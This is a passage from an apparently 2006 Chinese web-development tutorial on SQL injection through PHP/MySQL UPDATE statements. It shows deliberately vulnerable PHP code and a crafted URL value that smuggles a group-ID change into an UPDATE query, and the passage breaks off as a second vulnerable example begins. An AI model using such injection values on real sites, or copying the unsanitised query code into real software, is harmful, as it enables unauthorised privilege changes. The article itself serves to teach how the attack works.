UPDATE注射(mysql+php)的两个模式
2006-07-04 20:31:44 来源:WEB开发网核心提示: $result = mysql_db_query($dbname, $sql);$userinfo = mysql_fetch_array($result);echo "<p>SQL Query:$sql<p>";?> 为了关闭&rsquo
$result = mysql_db_query($dbname, $sql);
$userinfo = mysql_fetch_array($result);
echo "<p>SQL Query:$sql<p>";
?>
为了关闭’我们构造$p应该为123456’,groudid=’2 提交:
http://127.0.0.1/test2.php?p=123456’,groudid=’1 在gpc=on的情况下’变成了\’
提交的语句变成:SQL Query:update userinfo set pass=’123456\’,groudid=\’1’ where user=’heige’
mysql查询:
mysql> select * from userinfo;+---------+-------+--------------------+
| groudid | user | pass |
+---------+-------+--------------------+
| 2 | heige | 123456’,groudid=’1 |
+---------+-------+--------------------+
1 row in set (0.00 sec)
groudid并没有被修改。那么在变量被’’或""时 就完全没有被注射呢?不是 下面我们看模式2: <?php
//test3.php Mod2
$servername = "localhost";
$dbusername = "root";
$dbpassword = "";
$dbname = "test";
mysql_connect($servername,$dbusername,$dbpassword) or die ("数据库连接失败");
中查找“UPDATE注射(mysql+php)的两个模式”更多相关内容
中查找“UPDATE注射(mysql+php)的两个模式”更多相关内容更多精彩
赞助商链接
